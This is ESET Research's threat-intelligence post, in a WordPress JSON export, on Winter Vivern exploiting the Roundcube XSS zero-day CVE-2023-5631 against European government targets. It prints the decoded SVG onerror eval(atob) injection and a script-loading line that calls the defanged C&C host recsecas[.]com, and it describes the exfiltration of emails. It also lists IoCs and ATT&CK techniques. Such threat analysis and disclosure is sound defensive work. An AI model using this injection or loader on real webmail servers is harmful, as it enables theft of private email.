{"id":8485,"date":"2023-10-25T12:00:00","date_gmt":"2023-10-25T09:00:00","guid":{"rendered":"https:\/\/blog.eset.ee\/et\/2023\/10\/25\/winter-vivern-exploits-zero-day-vulnerability-in-roundcube-webmail-servers\/"},"modified":"2023-10-25T12:00:00","modified_gmt":"2023-10-25T09:00:00","slug":"winter-vivern-exploits-zero-day-vulnerability-in-roundcube-webmail-servers","status":"publish","type":"post","link":"https:\/\/blog.eset.ee\/et\/en\/2023\/10\/25\/winter-vivern-exploits-zero-day-vulnerability-in-roundcube-webmail-servers\/","title":{"rendered":"Winter Vivern exploits zero-day vulnerability in Roundcube Webmail servers"},"content":{"rendered":"<p>ESET Research has been closely tracking the cyberespionage operations of Winter Vivern for more than a year and, during our routine monitoring, we found that the group began exploiting a zero-day <a href=\"https:\/\/owasp.org\/www-community\/attacks\/xss\/\">XSS <\/a>vulnerability in the Roundcube Webmail server on October 11<sup>th<\/sup>, 2023. 
This is a different vulnerability than <a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-35730\">CVE-2020-35730<\/a>, which was also exploited by the group according to our research.<\/p>\n<p>According to ESET telemetry data, the campaign targeted Roundcube Webmail servers belonging to governmental entities and a think tank, all in Europe.<\/p>\n<blockquote>\n<div><strong>Vulnerability disclosure timeline:<\/strong><\/div>\n<ul>\n<li><strong>2023-10-12<\/strong>: ESET Research reported the vulnerability to the Roundcube team.<\/li>\n<li><strong>2023-10-14<\/strong>: The Roundcube team responded and acknowledged the vulnerability.<\/li>\n<li><strong>2023-10-14<\/strong>: The Roundcube team patched the vulnerability.<\/li>\n<li><strong>2023-10-16<\/strong>: The Roundcube team released security updates to address the vulnerability (1.6.4, 1.5.5, and 1.4.15).<\/li>\n<li><strong>2023-10-18<\/strong>: ESET CNA issued a CVE for the vulnerability (<a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2023-5631\">CVE-2023-5631<\/a>).<\/li>\n<li><strong>2023-10-25<\/strong>: ESET Research blog post published.<\/li>\n<\/ul>\n<\/blockquote>\n<p>We would like to thank the Roundcube developers for their quick reply and for patching the vulnerability in such a short time frame.<\/p>\n<h2><a><\/a>Winter Vivern profile<\/h2>\n<p>Winter Vivern is a cyberespionage group first revealed by <a href=\"https:\/\/www.domaintools.com\/resources\/blog\/winter-vivern-a-look-at-re-crafted-government-maldocs\/\">DomainTools<\/a> in 2021. It is thought to have been active since at least 2020 and it targets governments in Europe and Central Asia. 
To compromise its targets, the group uses malicious documents, phishing websites, and a custom PowerShell backdoor (see the articles from the <a href=\"https:\/\/scpc.gov.ua\/api\/docs\/4eeb6a10-b7aa-4396-8b04-e0e4b7fca1lj\/4eeb6a10-b7aa-4396-8b04-e0e4b7fca1lj.pdf\">State Cyber Protection Centre of Ukraine<\/a> and from <a href=\"https:\/\/www.sentinelone.com\/labs\/winter-vivern-uncovering-a-wave-of-global-espionage\/\">SentinelLabs<\/a>). We believe with low confidence that Winter Vivern is linked to <a href=\"https:\/\/www.welivesecurity.com\/en\/eset-research\/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus\/\">MoustachedBouncer<\/a>, a sophisticated Belarus-aligned group that we first published about in August, 2023.<\/p>\n<p>Winter Vivern has been targeting Zimbra and Roundcube email servers belonging to governmental entities since at least 2022 \u2013 see this article from <a href=\"https:\/\/www.proofpoint.com\/uk\/blog\/threat-insight\/exploitation-dish-best-served-cold-winter-vivern-uses-known-zimbra-vulnerability\">Proofpoint<\/a>. In particular, we observed that the group exploited <a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-35730\">CVE-2020-35730<\/a>, another XSS vulnerability in Roundcube, in August and September 2023. Note that <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/white-papers\/eset-sednit-full.pdf\">Sednit<\/a> (also known as APT28) is exploiting this old XSS vulnerability in Roundcube as well, sometimes against the same targets.<\/p>\n<h2><a><\/a>Technical details<\/h2>\n<p>Exploitation of the XSS vulnerability, assigned <a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2023-5631\">CVE-2023-5631<\/a>, can be done remotely by sending a specially crafted email message. 
In this Winter Vivern campaign, the emails were sent from <span>team.managment@outlook[.]com<\/span> and had the subject <span>Get started in your Outlook<\/span>, as shown in <span lang=\"EN-US\"><span><span>Figure 1.<\/span><\/span><\/span><\/p>\n<figure><img decoding=\"async\" alt=\"Figure-1-wintervivern-email\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-10\/winter-wivern\/figure-1-wintervivern-email.jpeg\" title=\"Figure 1. Malicious email message\" width=\"\"><figcaption><em>Figure 1. Malicious email message<\/em><\/figcaption><\/figure>\n<p>At first sight, the email doesn\u2019t seem malicious \u2013 but if we examine the HTML source code, shown in <span lang=\"EN-US\"><span><span>Figure 2<span>, we can see an SVG tag at the end, which contains a base64-encoded payload.<\/span><\/span><\/span><\/span><\/p>\n<figure><img decoding=\"async\" alt=\"Figure-2-winter-vivern-email-message\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-10\/winter-wivern\/figure-2-winter-vivern-email-message-1.png\" title=\"Figure 2. Email message with a malicious SVG tag\" width=\"\"><figcaption><em>Figure 2. Email message with a malicious SVG tag<\/em><\/figcaption><\/figure>\n<p>Once we decode the base64-encoded value in the <span>href<\/span> attribute of the <span>use<\/span> tag, we have:<\/p>\n<p><span>&lt;svg id=&quot;x&quot; xmlns=&quot;http:\/\/www.w3.org\/2000\/svg&quot;&gt; &lt;image href=&quot;x&quot; onerror=&quot;eval(atob(&#39;&lt;base64-encoded payload&gt;&#39;))&quot; \/&gt;&lt;\/svg&gt;<\/span><\/p>\n<p>As the <span>x<\/span> value argument of the <span>href <\/span>attribute is not a valid URL, this object\u2019s <span>onerror<\/span> attribute will be activated. 
Decoding the payload in the <span>onerror<\/span> attribute gives us the following JavaScript code (with the malicious URL manually defanged), which will be executed in the browser of the victim in the context of their Roundcube session:<\/p>\n<p><span>var fe=document.createElement(&#39;script&#39;);fe.src=&quot;https:\/\/recsecas[.]com\/controlserver\/checkupdate.js&quot;;document.body.appendChild(fe);<\/span><\/p>\n<p>Surprisingly, we noticed that the JavaScript injection worked on a fully patched Roundcube instance. It turned out that this was a zero-day XSS vulnerability affecting the server-side script <a href=\"https:\/\/github.com\/roundcube\/roundcubemail\/blob\/7b2df52ede57bab9e87e9c3bc00601eeca591a5e\/program\/lib\/Roundcube\/rcube_washtml.php\">rcube_washtml.php<\/a>, which doesn\u2019t properly sanitize the malicious SVG document before it is added to the HTML page displayed to a Roundcube user. We reported it to Roundcube and it was <a href=\"https:\/\/roundcube.net\/news\/2023\/10\/16\/security-update-1.6.4-released\">patched<\/a> on October 14<sup>th<\/sup>, 2023 (see this <a href=\"https:\/\/github.com\/roundcube\/roundcubemail\/commit\/6ee6e7ae3\">commit<\/a>). The vulnerability affects Roundcube <a href=\"https:\/\/github.com\/roundcube\/roundcubemail\/releases\">versions<\/a> 1.6.x before 1.6.4, 1.5.x before 1.5.5, and 1.4.x before 1.4.15.<\/p>\n<p>In summary, by sending a specially crafted email message, attackers are able to load arbitrary JavaScript code in the context of the Roundcube user\u2019s browser window. 
No manual interaction other than viewing the message in a web browser is required.<\/p>\n<p>The second stage is a simple JavaScript loader named <span>checkupdate.js<\/span> and is shown in <span><span><span>Figure 3<span lang=\"EN-CA\">.<\/span><\/span><\/span><\/span><\/p>\n<figure><img decoding=\"async\" alt=\"Figure-3-javascript-loader\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-10\/winter-wivern\/figure-3-javascript-loader-1-2.png\" title=\"Figure 3. JavaScript loader\" width=\"\"><figcaption><em>Figure 3. JavaScript loader<\/em><\/figcaption><\/figure>\n<p>The final JavaScript payload \u2013 shown in <span lang=\"EN-US\"><span><span>Figure 4 <span>\u2013 is able to list folders and emails in the current Roundcube account, and to exfiltrate email messages to the C&amp;C server by making HTTP requests to <span>https:\/\/recsecas[.]com\/controlserver\/saveMessage<\/span>.<\/span><\/span><\/span><\/span><\/p>\n<figure><img decoding=\"async\" alt=\"Figure-4-final-payload\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-10\/winter-wivern\/figure-4-final-payload-1-2.png\" title=\"Figure 4. Final JavaScript payload exfiltrating email messages from the Roundcube account (part of the obfuscated script removed for clarity)\" width=\"\"><figcaption><em>Figure 4. Final JavaScript payload exfiltrating email messages from the Roundcube account (part of the obfuscated script removed for clarity)<\/em><\/figcaption><\/figure>\n<h2><a><\/a>Conclusion<\/h2>\n<p>Winter Vivern has stepped up its operations by using a zero-day vulnerability in Roundcube. 
Previously, it was using known vulnerabilities in Roundcube and Zimbra, for which proofs of concept are available online.<\/p>\n<p>Despite the low sophistication of the group\u2019s toolset, it is a threat to governments in Europe because of its persistence, very regular running of phishing campaigns, and because a significant number of internet-facing applications are not regularly updated although they are known to contain vulnerabilities.<\/p>\n<blockquote>\n<p>For any inquiries about our research published on WeLiveSecurity, please contact us at <a href=\"mailto:threatintel@eset.com?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=autotagging&amp;utm_content=eset-research&amp;utm_term=en\">threatintel@eset.com<\/a>.<br \/>ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the <a href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers\">ESET Threat Intelligence<\/a> page.<\/p>\n<\/blockquote>\n<h2>IoCs<\/h2>\n<h3>Files<\/h3>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\">\n<thead>\n<tr>\n<td>\n<p><strong>SHA-1<\/strong><\/p>\n<\/td>\n<td>\n<p><strong>Filename<\/strong><\/p>\n<\/td>\n<td>\n<p><strong>Detection<\/strong><\/p>\n<\/td>\n<td>\n<p><strong>Description<\/strong><\/p>\n<\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>\n<p><span>97ED594EF2B5755F0549C6C5758377C0B87CFAE0<\/span><\/p>\n<\/td>\n<td>\n<p><span>checkupdate.js<\/span><\/p>\n<\/td>\n<td>\n<p>JS\/WinterVivern.B<\/p>\n<\/td>\n<td>\n<p>JavaScript loader.<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p><span>8BF7FCC70F6CE032217D9210EF30314DDD6B8135<\/span><\/p>\n<\/td>\n<td>\n<p>N\/A<\/p>\n<\/td>\n<td>\n<p>JS\/Kryptik.BIK<\/p>\n<\/td>\n<td>\n<p>JavaScript payload exfiltrating emails in 
Roundcube.<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Network<\/h2>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\">\n<thead>\n<tr>\n<td>\n<p><strong>IP<\/strong><\/p>\n<\/td>\n<td>\n<p><strong>Domain<\/strong><\/p>\n<\/td>\n<td>\n<p><strong>Hosting provider<\/strong><\/p>\n<\/td>\n<td>\n<p><strong>First seen<\/strong><\/p>\n<\/td>\n<td>\n<p><strong>Details<\/strong><\/p>\n<\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>\n<p><span>38.180.76[.]31<\/span><\/p>\n<\/td>\n<td>\n<p><span>recsecas[.]com<\/span><\/p>\n<\/td>\n<td>\n<p>M247 Europe SRL<\/p>\n<\/td>\n<td>\n<p>2023-09-28<\/p>\n<\/td>\n<td>\n<p>Winter Vivern C&amp;C server<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Email addresses<\/h2>\n<p><span>team.managment@outlook[.]com<\/span><\/p>\n<h1>MITRE ATT&amp;CK techniques<\/h1>\n<p>This table was built using <a href=\"https:\/\/attack.mitre.org\/resources\/versions\/\">version 13<\/a> of the MITRE ATT&amp;CK framework.<\/p>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"113\">\n<p><strong>Tactic<\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><strong>ID<\/strong><\/p>\n<\/td>\n<td width=\"151\">\n<p><strong>Name<\/strong><\/p>\n<\/td>\n<td width=\"265\">\n<p><strong>Description<\/strong><\/p>\n<\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td rowspan=\"3\" width=\"113\">\n<p><strong>Resource Development<\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1583\/001\">T1583.001<\/a><\/p>\n<\/td>\n<td width=\"151\">\n<p>Acquire Infrastructure: Domains<\/p>\n<\/td>\n<td width=\"265\">\n<p>Winter Vivern operators bought a domain at Registrar.eu.<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1583\/004\">T1583.004<\/a><\/p>\n<\/td>\n<td width=\"151\">\n<p>Acquire Infrastructure: Server<\/p>\n<\/td>\n<td width=\"265\">\n<p>Winter Vivern operators rented a server 
at M247.<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1587\/004\">T1587.004<\/a><\/p>\n<\/td>\n<td width=\"151\">\n<p>Develop Capabilities: Exploits<\/p>\n<\/td>\n<td width=\"265\">\n<p>Winter Vivern operators probably developed an exploit for Roundcube.<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"2\" width=\"113\">\n<p><strong>Initial Access<\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1190\">T1190<\/a><\/p>\n<\/td>\n<td width=\"151\">\n<p>Exploit Public-Facing Application<\/p>\n<\/td>\n<td width=\"265\">\n<p>Winter Vivern sent an email exploiting CVE\u20112023-5631 in Roundcube.<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1566\">T1566<\/a><\/p>\n<\/td>\n<td width=\"151\">\n<p>Phishing<\/p>\n<\/td>\n<td width=\"265\">\n<p>The vulnerability is triggered via a phishing email, which should be opened in the Roundcube webmail by the victim.<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><strong>Execution<\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1203\">T1203<\/a><\/p>\n<\/td>\n<td width=\"151\">\n<p>Exploitation for Client Execution<\/p>\n<\/td>\n<td width=\"265\">\n<p>The JavaScript payload is executed by an XSS vulnerability in Roundcube.<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><strong>Discovery<\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1087\/003\">T1087.003<\/a><\/p>\n<\/td>\n<td width=\"151\">\n<p>Account Discovery: Email Account<\/p>\n<\/td>\n<td width=\"265\">\n<p>The JavaScript payload can list folders in the email account.<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><strong>Collection<\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><a 
href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1114\/002\">T1114.002<\/a><\/p>\n<\/td>\n<td width=\"151\">\n<p>Email Collection: Remote Email Collection<\/p>\n<\/td>\n<td width=\"265\">\n<p>The JavaScript payload can exfiltrate emails from the Roundcube account.<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><strong>Command and Control<\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1071\/001\">T1071.001<\/a><\/p>\n<\/td>\n<td width=\"151\">\n<p>Application Layer Protocol: Web Protocols<\/p>\n<\/td>\n<td width=\"265\">\n<p>C&amp;C communications use HTTPS.<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><strong>Exfiltration<\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1041\">T1041<\/a><\/p>\n<\/td>\n<td width=\"151\">\n<p>Exfiltration Over C2 Channel<\/p>\n<\/td>\n<td width=\"265\">\n<p>Exfiltration is done via HTTPS and to the same C&amp;C server.<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><a href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers\"><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"296\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2022\/12\/eset-threat-intelligence.png\" width=\"915\"><\/a><\/p>\n<p class=\"wls-source\"><a href=\"https:\/\/www.welivesecurity.com\/en\/eset-research\/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers\/\" rel=\"nofollow noopener\" target=\"_blank\">Read the full analysis on WeLiveSecurity \u2192<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>ESET Research recommends updating Roundcube Webmail to the latest available version as soon as 
possible<\/p>\n","protected":false},"author":5,"featured_media":8486,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[2878],"tags":[],"class_list":["post-8485","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-eset-research"],"acf":[],"amp_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/posts\/8485","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/comments?post=8485"}],"version-history":[{"count":0,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/posts\/8485\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/media\/8486"}],"wp:attachment":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/media?parent=8485"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/categories?post=8485"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/tags?post=8485"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}